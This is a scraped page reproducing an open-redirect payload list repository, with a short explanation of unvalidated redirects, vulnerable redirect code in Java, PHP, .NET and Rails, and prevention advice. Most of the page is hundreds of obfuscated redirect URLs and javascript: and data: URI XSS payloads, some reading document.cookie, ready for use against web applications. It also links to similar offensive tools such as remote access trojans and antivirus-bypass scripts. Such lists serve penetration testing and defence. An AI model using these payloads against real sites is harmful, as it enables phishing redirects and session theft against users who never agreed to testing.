Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details

All Projects → payloadbox → Open Redirect Payload List

payloadbox / Open Redirect Payload List

Licence: mit

🎯 Open Redirect Payload List

Labels

security payload websecurity payloads

Projects that are alternatives of or similar to Open Redirect Payload List

Xss Payload List

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List

Stars: ✭ 2,617 (+1122.9%)

Mutual labels: payload, websecurity, payloads

Sql Injection Payload List

🎯 SQL Injection Payload List

Stars: ✭ 716 (+234.58%)

Mutual labels: payload, websecurity, payloads

Xxe Injection Payload List

🎯 XML External Entity (XXE) Injection Payload List

Stars: ✭ 304 (+42.06%)

Mutual labels: payload, websecurity, payloads

Rfi Lfi Payload List

🎯 RFI/LFI Payload List

Stars: ✭ 202 (-5.61%)

Mutual labels: payload, websecurity, payloads

🎯 Server Side Template Injection Payloads

Stars: ✭ 150 (-29.91%)

Mutual labels: payload, websecurity, payloads

Git All the Payloads! A collection of web attack payloads.

Stars: ✭ 2,862 (+1237.38%)

Mutual labels: payload, payloads

The purpose of this tool is to test the window10 defender protection and also other antivirus protection.

Stars: ✭ 59 (-72.43%)

Mutual labels: payload, payloads

Loki.Rat is a fork of the Ares RAT, it integrates new modules, like recording , lockscreen , and locate options. Loki.Rat is a Python Remote Access Tool.

Stars: ✭ 63 (-70.56%)

Mutual labels: payload, payloads

Bad char generator to instruct encoders such as shikata-ga-nai to transform those to other chars.

Stars: ✭ 178 (-16.82%)

Mutual labels: payload, payloads

Payload Arsenal for Pentration Tester and Bug Bounty Hunters

Stars: ✭ 421 (+96.73%)

Mutual labels: payload, payloads

HatVenom is a HatSploit native powerful payload generation tool that provides support for all common platforms and architectures.

Stars: ✭ 84 (-60.75%)

Mutual labels: payload, payloads

Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.

Stars: ✭ 463 (+116.36%)

Mutual labels: payload, payloads

Payloadsallthethings

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Stars: ✭ 32,909 (+15278.04%)

Mutual labels: payload, payloads

An Advanced Tool For Complete Apk-Modding In Termux ...

Stars: ✭ 180 (-15.89%)

Mutual labels: payload

Python Remote Administration Tool (RAT)

Stars: ✭ 2,018 (+842.99%)

Mutual labels: payload

OpenSSL对称算法、哈希校验、非对称算法、证书管理、SSL安全

Stars: ✭ 144 (-32.71%)

Mutual labels: websecurity

Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.

Stars: ✭ 186 (-13.08%)

Mutual labels: payload

Recsech is a tool for doing Footprinting and Reconnaissance on the target web. Recsech collects information such as DNS Information, Sub Domains, HoneySpot Detected, Subdomain takeovers, Reconnaissance On Github and much more you can see in Features in tools .

Stars: ✭ 173 (-19.16%)

Mutual labels: websecurity

A polyglot payload generator

Stars: ✭ 143 (-33.18%)

Mutual labels: payload

Proton Framework is a Windows post-exploitation framework similar to other Windows post-exploitation frameworks. The major difference is that the Proton Framework does most of its operations using Windows Script Host, with compatibility in the core to support a default installation of Windows 2000 with no service packs all the way through Windows 10.

Stars: ✭ 142 (-33.64%)

Mutual labels: payload

View All Similar Projects ➔

Open Redirect Payload List

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.

Java :

response.sendRedirect("http://www.mysite.com");

PHP :

<?php
/* Redirect browser */
header("Location: http://www.mysite.com");
?>

ASP .NET :

Response.Redirect("~/folder/Login.aspx")

Rails :

redirect_to login_path

In the examples above, the URL is being explicitly declared in the code and cannot be manipulated by an attacker.

Dangerous URL Redirects

The following examples demonstrate unsafe redirect and forward code.

Dangerous URL Redirect Example 1

The following Java code receives the URL from the parameter named url (GET or POST) and redirects to that URL:

response.sendRedirect(request.getParameter("url"));

The following PHP code obtains a URL from the query string (via the parameter named url) and then redirects the user to that URL:

$redirect_url = $_GET['url'];
header("Location: " . $redirect_url);

A similar example of C# .NET Vulnerable Code:

string url = request.QueryString["url"];
Response.Redirect(url);

And in Rails:

redirect_to params[:url]

The above code is vulnerable to an attack if no validation or extra method controls are applied to verify the certainty of the URL. This vulnerability could be used as part of a phishing scam by redirecting users to a malicious site.

If no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website, for example:

http://example.com/example.php?url=http://malicious.example.com

The user sees the link directing to the original trusted site (example.com) and does not realize the redirection that could take place

Dangerous URL Redirect Example 2

ASP .NET MVC 1 & 2 websites are particularly vulnerable to open redirection attacks. In order to avoid this vulnerability, you need to apply MVC 3.

The code for the LogOn action in an ASP.NET MVC 2 application is shown below. After a successful login, the controller returns a redirect to the returnUrl. You can see that no validation is being performed against the returnUrl parameter.

ASP.NET MVC 2 LogOn action in AccountController.cs (see Microsoft Docs link provided above for the context):

[HttpPost]
 public ActionResult LogOn(LogOnModel model, string returnUrl)
 {
   if (ModelState.IsValid)
   {
     if (MembershipService.ValidateUser(model.UserName, model.Password))
     {
       FormsService.SignIn(model.UserName, model.RememberMe);
       if (!String.IsNullOrEmpty(returnUrl))
       {
         return Redirect(returnUrl);
       }
       else
       {
         return RedirectToAction("Index", "Home");
       }
     }
     else
     {
       ModelState.AddModelError("", "The user name or password provided is incorrect.");
     }
   }

   // If we got this far, something failed, redisplay form
   return View(model);
 }

Preventing Unvalidated Redirects and Forwards

Safe use of redirects and forwards can be done in a number of ways:

Simply avoid using redirects and forwards.
If used, do not allow the url as user input for the destination. This can usually be done. In this case, you should have a method to validate URL.
If user input can’t be avoided, ensure that the supplied value is valid, appropriate for the application, and is authorized for the user.
It is recommended that any such destination input be mapped to a value, rather than the actual URL or portion of the URL, and that server side code translate this value to the target URL.
Sanitize input by creating a list of trusted URL's (lists of hosts or a regex).
Force all redirects to first go through a page notifying users that they are going off of your site, and have them click a link to confirm.

Open Redirect Payload List :

/%09/example.com
/%2f%2fexample.com
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cexample.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
//%09/example.com
//%5cexample.com
///%09/example.com
///%5cexample.com
////%09/example.com
////%5cexample.com
/////example.com
/////example.com/
////\;@example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
///\;@example.com
///example.com
///example.com/
//google.com/%2f..
//[email protected]/%2f..
///google.com/%2f..
///[email protected]/%2f..
////google.com/%2f..
////[email protected]/%2f..
https://google.com/%2f..
https://[email protected]/%2f..
/https://google.com/%2f..
/https://[email protected]/%2f..
//www.google.com/%2f%2e%2e
//[email protected]/%2f%2e%2e
///www.google.com/%2f%2e%2e
///[email protected]/%2f%2e%2e
////www.google.com/%2f%2e%2e
////[email protected]/%2f%2e%2e
https://www.google.com/%2f%2e%2e
https://[email protected]/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
//google.com/
//[email protected]/
///google.com/
///[email protected]/
////google.com/
////[email protected]/
https://google.com/
https://[email protected]/
/https://google.com/
/https://[email protected]/
//google.com//
//[email protected]//
///google.com//
///[email protected]//
////google.com//
////[email protected]//
https://google.com//
https://[email protected]//
//https://google.com//
//https://[email protected]//
//www.google.com/%2e%2e%2f
//[email protected]/%2e%2e%2f
///www.google.com/%2e%2e%2f
///[email protected]/%2e%2e%2f
////www.google.com/%2e%2e%2f
////[email protected]/%2e%2e%2f
https://www.google.com/%2e%2e%2f
https://[email protected]/%2e%2e%2f
//https://www.google.com/%2e%2e%2f
//https://[email protected]/%2e%2e%2f
///www.google.com/%2e%2e
///[email protected]/%2e%2e
////www.google.com/%2e%2e
////[email protected]/%2e%2e
https:///www.google.com/%2e%2e
https:///[email protected]/%2e%2e
//https:///www.google.com/%2e%2e
//[email protected]:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
/https://[email protected]/%2e%2e
///www.google.com/%2f%2e%2e
///[email protected]/%2f%2e%2e
////www.google.com/%2f%2e%2e
////[email protected]/%2f%2e%2e
https:///www.google.com/%2f%2e%2e
https:///[email protected]/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
/https:///www.google.com/%2f%2e%2e
/https:///[email protected]/%2f%2e%2e
/%09/google.com
/%09/[email protected]
//%09/google.com
//%09/[email protected]
///%09/google.com
///%09/[email protected]
////%09/google.com
////%09/[email protected]
https://%09/google.com
https://%09/[email protected]
/%5cgoogle.com
/%[email protected]
//%5cgoogle.com
//%[email protected]
///%5cgoogle.com
///%[email protected]
////%5cgoogle.com
////%[email protected]
https://%5cgoogle.com
https://%[email protected]
/https://%5cgoogle.com
/https://%[email protected]
https://google.com
https://[email protected]
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google%00.com
https://www.whitelisteddomain.tld/https://www.google.com/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0xd83ad6ce
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://3627734734
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://472.314.470.462
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0330.072.0326.0316
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.00072.0000326.00000316
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://[::216.58.214.206]
http://[email protected][::216.58.214.206]
http://[email protected][::216.58.214.206]
http://XY>.7d8T\[email protected][::216.58.214.206]
http://[::ffff:216.58.214.206]
http://[email protected][::ffff:216.58.214.206]
http://[email protected][::ffff:216.58.214.206]
http://XY>.7d8T\[email protected][::ffff:216.58.214.206]
http://0xd8.072.54990
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0xd8.3856078
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.3856078
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.0x3a.54990
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http:0xd8.0x3a.0xd6.0xce
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0xd83ad6ce
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:3627734734
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:472.314.470.462
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0330.072.0326.0316
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.00072.0000326.00000316
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:[::216.58.214.206]
http:[email protected][::216.58.214.206]
http:[email protected][::216.58.214.206]
http:XY>.7d8T\[email protected][::216.58.214.206]
http:[::ffff:216.58.214.206]
http:[email protected][::ffff:216.58.214.206]
http:[email protected][::ffff:216.58.214.206]
http:XY>.7d8T\[email protected][::ffff:216.58.214.206]
http:0xd8.072.54990
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0xd8.3856078
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.3856078
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.0x3a.54990
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ｰgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ｰgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//google.com
//google.com\@www.whitelisteddomain.tld
https://:@google.com\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://google.com:80#@www.whitelisteddomain.tld/
http://google.com:[email protected]/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///example.com/%2f..
///example.com//
//example.com
//example.com/
//example.com/%2e%2e
//example.com/%2e%2e%2f
//example.com/%2f%2e%2e
//example.com/%2f..
//example.com//
//google%00.com
//google%E3%80%82com
//https:///example.com/%2e%2e
//https://example.com/%2e%2e%2f
//https://example.com//
/<>//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/\/\/example.com/
/\/example.com/
/example.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http:/example.com
/https:/%5cexample.com/
/https://%09/example.com
/https://%5cexample.com
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https:example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com

//%2fxgoogle.com
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
//localdomain.pw/%2f..
//[email protected]/%2f..
///localdomain.pw/%2f..
///[email protected]/%2f..
////localdomain.pw/%2f..
////[email protected]/%2f..
https://localdomain.pw/%2f..
https://[email protected]/%2f..
/https://localdomain.pw/%2f..
/https://[email protected]/%2f..
//localdomain.pw/%2f%2e%2e
//[email protected]/%2f%2e%2e
///localdomain.pw/%2f%2e%2e
///[email protected]/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
////[email protected]/%2f%2e%2e
https://localdomain.pw/%2f%2e%2e
https://[email protected]/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
//localdomain.pw/
//[email protected]/
///localdomain.pw/
///[email protected]/
////localdomain.pw/
////[email protected]/
https://localdomain.pw/
https://[email protected]/
/https://localdomain.pw/
/https://[email protected]/
//localdomain.pw//
//[email protected]//
///localdomain.pw//
///[email protected]//
////localdomain.pw//
////[email protected]//
https://localdomain.pw//
https://[email protected]//
//https://localdomain.pw//
//https://[email protected]//
//localdomain.pw/%2e%2e%2f
//[email protected]/%2e%2e%2f
///localdomain.pw/%2e%2e%2f
///[email protected]/%2e%2e%2f
////localdomain.pw/%2e%2e%2f
////[email protected]/%2e%2e%2f
https://localdomain.pw/%2e%2e%2f
https://[email protected]/%2e%2e%2f
//https://localdomain.pw/%2e%2e%2f
//https://[email protected]/%2e%2e%2f
///localdomain.pw/%2e%2e
///[email protected]/%2e%2e
////localdomain.pw/%2e%2e
////[email protected]/%2e%2e
https:///localdomain.pw/%2e%2e
https:///[email protected]/%2e%2e
//https:///localdomain.pw/%2e%2e
//[email protected]:///localdomain.pw/%2e%2e
/https://localdomain.pw/%2e%2e
/https://[email protected]/%2e%2e
///localdomain.pw/%2f%2e%2e
///[email protected]/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
////[email protected]/%2f%2e%2e
https:///localdomain.pw/%2f%2e%2e
https:///[email protected]/%2f%2e%2e
/https://localdomain.pw/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
/https:///localdomain.pw/%2f%2e%2e
/https:///[email protected]/%2f%2e%2e
/%09/localdomain.pw
/%09/[email protected]
//%09/localdomain.pw
//%09/[email protected]
///%09/localdomain.pw
///%09/[email protected]
////%09/localdomain.pw
////%09/[email protected]
https://%09/localdomain.pw
https://%09/[email protected]
/%5clocaldomain.pw
/%[email protected]
//%5clocaldomain.pw
//%[email protected]
///%5clocaldomain.pw
///%[email protected]
////%5clocaldomain.pw
////%[email protected]
https://%5clocaldomain.pw
https://%[email protected]
/https://%5clocaldomain.pw
/https://%[email protected]
https://localdomain.pw
https://[email protected]
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//localdomain.pw
https:localdomain.pw
//localdomain%E3%80%82pw
\/\/localdomain.pw/
/\/localdomain.pw/
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
//localdomain%00.pw
https://www.whitelisteddomain.tld/https://localdomain.pw/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0xd83ad6ce
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://3627734734
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://472.314.470.462
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0330.072.0326.0316
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.00072.0000326.00000316
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://[::216.58.214.206]
http://[email protected][::216.58.214.206]
http://[email protected][::216.58.214.206]
http://XY>.7d8T\[email protected][::216.58.214.206]
http://[::ffff:216.58.214.206]
http://[email protected][::ffff:216.58.214.206]
http://[email protected][::ffff:216.58.214.206]
http://XY>.7d8T\[email protected][::ffff:216.58.214.206]
http://0xd8.072.54990
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0xd8.3856078
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.3856078
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.0x3a.54990
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http:0xd8.0x3a.0xd6.0xce
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0xd83ad6ce
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:3627734734
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:472.314.470.462
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0330.072.0326.0316
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.00072.0000326.00000316
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:[::216.58.214.206]
http:[email protected][::216.58.214.206]
http:[email protected][::216.58.214.206]
http:XY>.7d8T\[email protected][::216.58.214.206]
http:[::ffff:216.58.214.206]
http:[email protected][::ffff:216.58.214.206]
http:[email protected][::ffff:216.58.214.206]
http:XY>.7d8T\[email protected][::ffff:216.58.214.206]
http:0xd8.072.54990
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0xd8.3856078
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.3856078
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.0x3a.54990
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
〱localdomain.pw
〵localdomain.pw
ゝlocaldomain.pw
ーlocaldomain.pw
ｰlocaldomain.pw
/〱localdomain.pw
/〵localdomain.pw
/ゝlocaldomain.pw
/ーlocaldomain.pw
/ｰlocaldomain.pw
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//localdomain.pw
//localdomain.pw\@www.whitelisteddomain.tld
https://:@localdomain.pw\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://localdomain.pw:80#@www.whitelisteddomain.tld/
http://localdomain.pw:[email protected]/
http://[email protected][email protected]/
http://XY>.7d8T\[email protected][email protected]/
http://[email protected]@localdomain.pw/
http://XY>.7d8T\[email protected]@localdomain.pw/
http://www.whitelisteddomain.tld+&@localdomain.pw#[email protected]/
http://localdomain.pw\twww.whitelisteddomain.tld/
//localdomain.pw:80#@www.whitelisteddomain.tld/
//localdomain.pw:[email protected]/
//[email protected][email protected]/
//XY>.7d8T\[email protected][email protected]/
//[email protected]@localdomain.pw/
//XY>.7d8T\[email protected]@localdomain.pw/
//www.whitelisteddomain.tld+&@localdomain.pw#[email protected]/
//localdomain.pw\twww.whitelisteddomain.tld/
//;@localdomain.pw
http://;@localdomain.pw
@localdomain.pw
javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
http://localdomain.pw%2f%2f.www.whitelisteddomain.tld/
http://localdomain.pw%5c%5c.www.whitelisteddomain.tld/
http://localdomain.pw%3F.www.whitelisteddomain.tld/
http://localdomain.pw%23.www.whitelisteddomain.tld/
http://www.whitelisteddomain.tld:80%40localdomain.pw/
http://www.whitelisteddomain.tld%2elocaldomain.pw/
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5clocaldomain.pw/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
/http://localdomain.pw
/%2f%2flocaldomain.pw
/localdomain.pw/%2f%2e%2e
/http:/localdomain.pw
/.localdomain.pw
http://.localdomain.pw
.localdomain.pw
///\;@localdomain.pw
///localdomain.pw
/////localdomain.pw/
/////localdomain.pw
java%0ascript:alert(1)
java%09script:alert(1)
java%0dscript:alert(1)
javascript://%0aalert(1)
Javas%26%2399;ript:alert(1)
data:www.whitelisteddomain.tld;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
http://www.localdomain.pw\.www.whitelisteddomain.tld
%19Jav%09asc%09ript:https%20://www.whitelisteddomain.tld/%250Aconfirm%25281%2529
//[email protected]/%2f..
///google.com/%2f..
///[email protected]/%2f..
////google.com/%2f..
////[email protected]/%2f..
https://google.com/%2f..
https://[email protected]/%2f..
/https://google.com/%2f..
/https://[email protected]/%2f..
//google.com/%2f%2e%2e
//[email protected]/%2f%2e%2e
///google.com/%2f%2e%2e
///[email protected]/%2f%2e%2e
////google.com/%2f%2e%2e
////[email protected]/%2f%2e%2e
https://google.com/%2f%2e%2e
https://[email protected]/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
//google.com/
//[email protected]/
///google.com/
///[email protected]/
////google.com/
////[email protected]/
https://google.com/
https://[email protected]/
/https://google.com/
/https://[email protected]/
//google.com//
//[email protected]//
///google.com//
///[email protected]//
////google.com//
////[email protected]//
https://google.com//
https://[email protected]//
//https://google.com//
//https://[email protected]//
//google.com/%2e%2e%2f
//[email protected]/%2e%2e%2f
///google.com/%2e%2e%2f
///[email protected]/%2e%2e%2f
////google.com/%2e%2e%2f
////[email protected]/%2e%2e%2f
https://google.com/%2e%2e%2f
https://[email protected]/%2e%2e%2f
//https://google.com/%2e%2e%2f
//https://[email protected]/%2e%2e%2f
///google.com/%2e%2e
///[email protected]/%2e%2e
////google.com/%2e%2e
////[email protected]/%2e%2e
https:///google.com/%2e%2e
https:///[email protected]/%2e%2e
//https:///google.com/%2e%2e
//[email protected]:///google.com/%2e%2e
/https://google.com/%2e%2e
/https://[email protected]/%2e%2e
///google.com/%2f%2e%2e
///[email protected]/%2f%2e%2e
////google.com/%2f%2e%2e
////[email protected]/%2f%2e%2e
https:///google.com/%2f%2e%2e
https:///[email protected]/%2f%2e%2e
/https://google.com/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
/https:///google.com/%2f%2e%2e
/https:///[email protected]/%2f%2e%2e
/%09/google.com
/%09/[email protected]
//%09/google.com
//%09/[email protected]
///%09/google.com
///%09/[email protected]
////%09/google.com
////%09/[email protected]
https://%09/google.com
https://%09/[email protected]
/%5cgoogle.com
/%[email protected]
//%5cgoogle.com
//%[email protected]
///%5cgoogle.com
///%[email protected]
////%5cgoogle.com
////%[email protected]
https://%5cgoogle.com
https://%[email protected]
/https://%5cgoogle.com
/https://%[email protected]
https://google.com
https://[email protected]
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google%00.com
https://example.com/https://google.com/
";alert(0);//
javascript://example.com?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0xd83ad6ce
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://3627734734
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://472.314.470.462
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0330.072.0326.0316
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.00072.0000326.00000316
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://[::216.58.214.206]
http://[email protected][::216.58.214.206]
http://[email protected][::216.58.214.206]
http://XY>.7d8T\[email protected][::216.58.214.206]
http://[::ffff:216.58.214.206]
http://[email protected][::ffff:216.58.214.206]
http://[email protected][::ffff:216.58.214.206]
http://XY>.7d8T\[email protected][::ffff:216.58.214.206]
http://0xd8.072.54990
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0xd8.3856078
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.3856078
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.0x3a.54990
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http:0xd8.0x3a.0xd6.0xce
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0xd83ad6ce
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:3627734734
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:472.314.470.462
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0330.072.0326.0316
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.00072.0000326.00000316
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:[::216.58.214.206]
http:[email protected][::216.58.214.206]
http:[email protected][::216.58.214.206]
http:XY>.7d8T\[email protected][::216.58.214.206]
http:[::ffff:216.58.214.206]
http:[email protected][::ffff:216.58.214.206]
http:[email protected][::ffff:216.58.214.206]
http:XY>.7d8T\[email protected][::ffff:216.58.214.206]
http:0xd8.072.54990
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0xd8.3856078
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.3856078
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.0x3a.54990
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ｰgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ｰgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//google.com
//google.com\@example.com
https://:@google.com\@example.com
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://google.com:80#@example.com/
http://google.com:[email protected]/
http://[email protected][email protected]/
http://XY>.7d8T\[email protected][email protected]/
http://[email protected]@google.com/
http://XY>.7d8T\[email protected]@google.com/
